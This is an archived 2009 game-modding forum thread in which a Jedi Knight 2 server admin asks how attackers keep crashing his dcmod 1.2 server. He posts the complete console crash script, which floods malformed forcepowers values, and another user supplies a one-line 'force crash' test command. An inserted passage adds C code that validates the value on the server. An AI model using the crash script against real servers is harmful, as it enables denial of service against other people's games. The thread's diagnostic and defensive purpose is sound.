Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
All times are UTC [ DST ]

This topic is locked, you cannot edit posts or make further replies. [ 17 posts ]
 Post subject: dc mod vulnerability?
PostPosted: 22 Jun 2009 02:59 

Joined: 22 Jul 2008 02:26
Posts: 14
hello again...

i have a JK2 server and clan, it's one of the last populated servers in jk2, and I'm running dcmod v1.2.

There are some guys that have a script or something that restarts the server, every time they want it.
When the server is populated, they just come and restart.
I'm wondering if you guys know how i can fix that


 Post subject: Re: dc mod vulnerability?
PostPosted: 22 Jun 2009 09:20 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
which of the work-arounds on http://aluigi.org/patches.htm#quake3 have you applied?
I don't know this mod or jk2 so it's possible that there is also a bug affecting this specific mod.


 Post subject: Re: dc mod vulnerability?
PostPosted: 22 Jun 2009 20:09 

Joined: 22 Jul 2008 02:26
Posts: 14
I applied all patches.
Yes this script only works on dcmod 1.2.

I don't know what to do, nobody wants to share that script with me, and they keep restarting my server


 Post subject: Re: dc mod vulnerability?
PostPosted: 23 Jun 2009 02:15 

Joined: 21 Feb 2009 15:32
Posts: 8
It looks like the mod has some stages of admin rcon, post your cfg with all cvars, you can change your rcon cvars later


 Post subject: Re: dc mod vulnerability?
PostPosted: 23 Jun 2009 16:34 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
evan1715 wrote:
--DS-Online v1.32 is vulnerable to name crash/glitch.
--DC Mod v1.2 is vulnerable to flood.
--Jedi Academy Mod 1.6 is vulnerable to flood, name crash, force crash and fake players.

userinfo flood - rapid changing of a client's userinfo, overflowing the server causing lag and potential crashing
fix: get a different mod o_O


 Post subject: Re: dc mod vulnerability?
PostPosted: 23 Jun 2009 17:31 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
a generic useful suggestion valid for any field is to always check the date of the latest version of a software/game/mod and verify that it's still supported by its author and how much it's supported (for example if the author replies soon to the reports of the users and fixes the problems immediately).

using old software or an old third-party component is the first way to get problems (and from what I have seen this dc mod no longer has a homepage and it's closed source)


 Post subject: Re: dc mod vulnerability?
PostPosted: 26 Jun 2009 20:19 

Joined: 22 Jul 2008 02:26
Posts: 14
I got my hands on the script that does this.

I'd prefer not to post it on the forum since all remaining jk2 servers use dcmod... so if anybody visits ...

shd i pm u luigi?


 Post subject: Re: dc mod vulnerability?
PostPosted: 26 Jun 2009 20:26 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
personally I'm not interested in this for various reasons (old unsupported mod, usually the bugs in these mods are hard/boring to fix, general lack of interest and so on).


 Post subject: Re: dc mod vulnerability?
PostPosted: 29 Jun 2009 22:05 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
darthboss wrote:
I got my hands on the script that does this.

I'd prefer not to post it on the forum since all remaining jk2 servers use dcmod... so if anybody visits ...

shd i pm u luigi?

u should pm me it and ill tell u if i can help u with it

u can't prevent the spread of this 'script' it will get out to the general public of jk2 1.04 and it will be used, just like every other exploit

and no, i wont be passing it around either.


 Post subject: Re: dc mod vulnerability?
PostPosted: 03 Jul 2009 19:02 

Joined: 22 Jul 2008 02:26
Posts: 14
bind "p" "vstr crash00"
set crash00 " vstr crash01; vstr crash01; vstr crash01; wait 250; vstr crash02; vstr crash02; vstr crash02"
set crash01 " -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7"
set crash02 " forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged"


This is the script.

It works like this.

You go spec, exec the script, then join game with these force variables.
And it crashes the server.


It works on most dcmod servers.... but not all.. some have a fix already.

The servers with FIX don't let you join game with those force variables, it asks you to fill the force points.
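
The behaviour described for fixed servers (a join with malformed force variables is refused and the player has to fill the force points again) is what a server-side format check on the forcepowers value produces. The following is an added example, not part of the original post and not dcmod's or the game's code; the rank-side-levels layout, the limits in the defines and all function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed layout of the value: "<rank>-<side>-<levels>". The limits below
   are assumptions for this example, not values taken from dcmod. */
#define FP_MAX_RANK     7   /* highest rank digit accepted */
#define FP_NUM_POWERS   18  /* one level digit per force power */
#define FP_MAX_LEVEL    3   /* highest level of a single power */
#define FP_SAFE_DEFAULT "0-1-" "000000" "000000" "000000"

/* Return 1 only when s is exactly "<rank>-<side>-<18 level digits>".
   s must be NUL-terminated. */
int fp_is_valid(const char *s)
{
    size_t i;

    if (s == NULL || strlen(s) != 4 + FP_NUM_POWERS)
        return 0;                     /* length first, so indexing is safe */
    if (s[0] < '0' || s[0] > '0' + FP_MAX_RANK)
        return 0;
    if (s[1] != '-' || s[3] != '-')
        return 0;
    if (s[2] != '1' && s[2] != '2')   /* assumed side values */
        return 0;
    for (i = 0; i < FP_NUM_POWERS; i++) {
        char c = s[4 + i];
        if (c < '0' || c > '0' + FP_MAX_LEVEL)
            return 0;
    }
    return 1;
}

/* What the server passes on to the game code: the client's string when it
   validates, otherwise a fixed default so the player must choose again. */
const char *fp_sanitize(const char *s)
{
    return fp_is_valid(s) ? s : FP_SAFE_DEFAULT;
}

int main(void)
{
    /* Constructed inputs: one well-formed value and the "1337" test value. */
    const char *in[] = { "7-1-" "032330" "000000" "001333", "1337" };
    size_t i;

    for (i = 0; i < 2; i++)
        printf("%-24s -> %s\n", in[i], fp_sanitize(in[i]));
    return 0;
}
```

The check has to run before any code that indexes into the string, and on every change of the value, not only on the first join.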


 Post subject: Re: dc mod vulnerability?
PostPosted: 03 Jul 2009 22:17 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
ok, this looks like force crash... but extreme version lol.
so let's go ahead and try and see if ur version of dcmod is fixed against force crash
go into your server, open your console and type in
/set forcepowers 1337;wait 1;forcechanged
kill urself and respawn.....
if u respawn with no server crash, i want u to do the same method people are using with this.
go to spec, go ahead and bind it and do it repeatedly and then join.

if the server does not crash with the regular force crash, ur mod is protected, but apparently not from this one :P
so the mod is probably a very basic protection and these people cheated the system and found a bug in the patch.

so go ahead and test it on ur version of dcmod and tell me ur results and we'll go on from there xD
also, if it doesn't crash with the command line given above, give me ur ip to ur server so i can test some stuff


 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 00:50 

Joined: 22 Jul 2008 02:26
Posts: 14
it crashed.
i did that command, when i killed myself i was spec.
when i rejoined game, server crashed.

78.143.19.186:4002


this is my server.
thanks for the help, I owe you a beer


 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 02:25 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
ah so ur version of dcmod is not fixed from force crash :P
it's a very common crash people use :P
does dcmod have an open source so the bug can be fixed through code?


 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 09:17 

Joined: 22 Jul 2008 02:26
Posts: 14
Well DCMOD is a Pk3 + server.cfg

I can send you the pk3 and the cfg


what about this...

http://gamall-ida.com/f/download/file.p ... 57bc453512


 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 10:20 

Joined: 22 Jul 2008 02:26
Posts: 14
NVM, PROBLEM SOLVED, I REPLACED THE PK3 WITH SOME OF A FRIEND.
DCMOD.PK3, AND IT DOESN'T CRASH IT NOW.

THANKS FOR EVERYTHING.


 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 16:08 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
uhmmm so basically you used a multiplayer server mod from an untrusted source (the so called "friends" are the first cause of security problems) without knowing what it really changes or who created it... wow, and then people wonder why they get "hacked" (meaningless word that many people like to use for anything) eh eh eh :)


 Post subject: Re: dc mod vulnerability?
PostPosted: 06 Jul 2009 04:14 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
uh ok cool, i suppose.

calm down luigi :)

